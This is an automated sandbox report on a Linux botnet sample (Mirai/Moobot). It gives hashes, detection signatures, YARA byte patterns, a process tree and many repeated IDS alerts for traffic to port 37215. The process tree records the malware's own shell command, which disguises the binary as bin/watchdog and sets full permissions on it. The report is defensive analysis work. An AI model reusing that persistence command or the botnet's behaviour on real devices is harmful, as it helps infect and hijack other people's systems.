Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
bot.x86.elf

Overview

General Information

Sample name:bot.x86.elf
Analysis ID:1447081
MD5:19c2d1c3ba0c55c975cf3db34940774b
SHA1:8e31d5442fbdb616b83e3bd4323c30bfac3ce76e
SHA256:86cd076d33abfdba0fe06024c2694fb56ee80c569b5944ec7375b5385698d48e
Infos:

Detection

Mirai, Moobot
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Yara detected Moobot
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1447081
Start date and time:2024-05-24 10:58:11 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bot.x86.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@19/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/bot.x86.elf
PID:5427
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • bot.x86.elf (PID: 5427, Parent: 5347, MD5: 19c2d1c3ba0c55c975cf3db34940774b) Arguments: /tmp/bot.x86.elf
    • sh (PID: 5428, Parent: 5427, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/bot.x86.elf bin/watchdog; chmod 777 bin/watchdog"
      • sh New Fork (PID: 5429, Parent: 5428)
      • rm (PID: 5429, Parent: 5428, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/watchdog
      • sh New Fork (PID: 5430, Parent: 5428)
      • mkdir (PID: 5430, Parent: 5428, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 5431, Parent: 5428)
      • mv (PID: 5431, Parent: 5428, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/bot.x86.elf bin/watchdog
      • sh New Fork (PID: 5432, Parent: 5428)
      • chmod (PID: 5432, Parent: 5428, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/watchdog
  • dash New Fork (PID: 5473, Parent: 3587)
  • rm (PID: 5473, Parent: 3587, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.b5Wv15YX0x /tmp/tmp.0KMjnFjb9Z /tmp/tmp.5S47IrwHi8
  • dash New Fork (PID: 5474, Parent: 3587)
  • rm (PID: 5474, Parent: 3587, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.b5Wv15YX0x /tmp/tmp.0KMjnFjb9Z /tmp/tmp.5S47IrwHi8
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
bot.x86.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    bot.x86.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      bot.x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        bot.x86.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0xf658:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf66c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf680:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf694:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf6a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf6bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf6d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf6e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf6f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf70c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf720:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf734:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf748:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf75c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf770:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf784:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf798:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf7ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf7c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf7d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0xf7e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        bot.x86.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
        • 0xb81d:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
        Click to see the 6 entries
        SourceRuleDescriptionAuthorStrings
        5427.1.0000000008048000.000000000805a000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
          5427.1.0000000008048000.000000000805a000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5427.1.0000000008048000.000000000805a000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5427.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0xf658:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf66c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf680:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf694:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf6a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf6bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf6d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf6e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf6f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf70c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf720:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf734:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf748:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf75c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf770:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf784:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf798:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf7ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf7c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf7d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0xf7e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              5427.1.0000000008048000.000000000805a000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
              • 0xb81d:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
              Click to see the 9 entries
              Timestamp:05/24/24-10:59:30.252627
              SID:2835222
              Source Port:50440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987171
              SID:2829579
              Source Port:54812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764497
              SID:2829579
              Source Port:41746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764047
              SID:2835222
              Source Port:47162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445235
              SID:2835222
              Source Port:48680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976569
              SID:2829579
              Source Port:37028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232783
              SID:2835222
              Source Port:50426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.271192
              SID:2835222
              Source Port:53318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187963
              SID:2829579
              Source Port:42804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536570
              SID:2829579
              Source Port:40372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302961
              SID:2829579
              Source Port:59690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635980
              SID:2829579
              Source Port:39596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458346
              SID:2829579
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327819
              SID:2829579
              Source Port:60556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741811
              SID:2835222
              Source Port:60402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267097
              SID:2835222
              Source Port:34790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329359
              SID:2835222
              Source Port:58608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395933
              SID:2835222
              Source Port:51440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547287
              SID:2829579
              Source Port:40966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663692
              SID:2835222
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.398254
              SID:2829579
              Source Port:49164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.752748
              SID:2829579
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572420
              SID:2829579
              Source Port:33190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481838
              SID:2835222
              Source Port:53770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596736
              SID:2835222
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270021
              SID:2835222
              Source Port:42712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280862
              SID:2835222
              Source Port:44372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383333
              SID:2829579
              Source Port:56580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634049
              SID:2829579
              Source Port:36480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279745
              SID:2829579
              Source Port:56920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199841
              SID:2829579
              Source Port:43042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967508
              SID:2835222
              Source Port:58278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474750
              SID:2829579
              Source Port:56992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504527
              SID:2829579
              Source Port:39514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368569
              SID:2835222
              Source Port:53992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155569
              SID:2829579
              Source Port:37336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504630
              SID:2835222
              Source Port:57436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585165
              SID:2835222
              Source Port:38590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870297
              SID:2829579
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694686
              SID:2835222
              Source Port:50500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231848
              SID:2829579
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395519
              SID:2835222
              Source Port:60328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057564
              SID:2829579
              Source Port:43528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747712
              SID:2829579
              Source Port:55474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055753
              SID:2835222
              Source Port:39878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661875
              SID:2829579
              Source Port:37494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395751
              SID:2829579
              Source Port:59334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833808
              SID:2829579
              Source Port:46572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641609
              SID:2829579
              Source Port:40310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201190
              SID:2835222
              Source Port:51526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383363
              SID:2835222
              Source Port:45744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522225
              SID:2829579
              Source Port:40748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349870
              SID:2829579
              Source Port:57604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169272
              SID:2829579
              Source Port:36254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567294
              SID:2829579
              Source Port:42342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103599
              SID:2835222
              Source Port:47206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397756
              SID:2835222
              Source Port:34750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101704
              SID:2829579
              Source Port:45910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097243
              SID:2829579
              Source Port:42030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308808
              SID:2829579
              Source Port:32898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187418
              SID:2829579
              Source Port:43252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538195
              SID:2835222
              Source Port:52712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372031
              SID:2829579
              Source Port:43914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860041
              SID:2829579
              Source Port:35808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062283
              SID:2835222
              Source Port:51688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625280
              SID:2829579
              Source Port:35492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448777
              SID:2835222
              Source Port:38480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638022
              SID:2835222
              Source Port:55380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.067648
              SID:2835222
              Source Port:50914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507421
              SID:2835222
              Source Port:58868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928894
              SID:2835222
              Source Port:48566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119375
              SID:2835222
              Source Port:51966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635749
              SID:2835222
              Source Port:44676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448056
              SID:2829579
              Source Port:54318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128071
              SID:2835222
              Source Port:55720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502487
              SID:2829579
              Source Port:60542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976519
              SID:2835222
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724255
              SID:2835222
              Source Port:39876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642927
              SID:2835222
              Source Port:35364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625253
              SID:2829579
              Source Port:49076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536364
              SID:2835222
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726095
              SID:2835222
              Source Port:48300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607078
              SID:2835222
              Source Port:52980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.059912
              SID:2835222
              Source Port:35746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575783
              SID:2835222
              Source Port:43430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422198
              SID:2835222
              Source Port:50376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189027
              SID:2829579
              Source Port:41080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044419
              SID:2835222
              Source Port:48466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078571
              SID:2829579
              Source Port:49642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663611
              SID:2835222
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979416
              SID:2835222
              Source Port:42938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053382
              SID:2829579
              Source Port:43002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982131
              SID:2829579
              Source Port:35278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608174
              SID:2835222
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044765
              SID:2829579
              Source Port:52552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059656
              SID:2829579
              Source Port:50450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495282
              SID:2829579
              Source Port:56010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575607
              SID:2835222
              Source Port:48696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625275
              SID:2829579
              Source Port:54458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425799
              SID:2829579
              Source Port:52752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401564
              SID:2835222
              Source Port:41008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457697
              SID:2829579
              Source Port:60306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164083
              SID:2829579
              Source Port:50394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205134
              SID:2829579
              Source Port:51052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727626
              SID:2835222
              Source Port:59628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245339
              SID:2835222
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269310
              SID:2829579
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979774
              SID:2829579
              Source Port:55936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663654
              SID:2829579
              Source Port:59218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195279
              SID:2835222
              Source Port:33956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492523
              SID:2835222
              Source Port:42800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574833
              SID:2835222
              Source Port:58640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819511
              SID:2829579
              Source Port:47160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246396
              SID:2835222
              Source Port:35856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622842
              SID:2835222
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119497
              SID:2829579
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
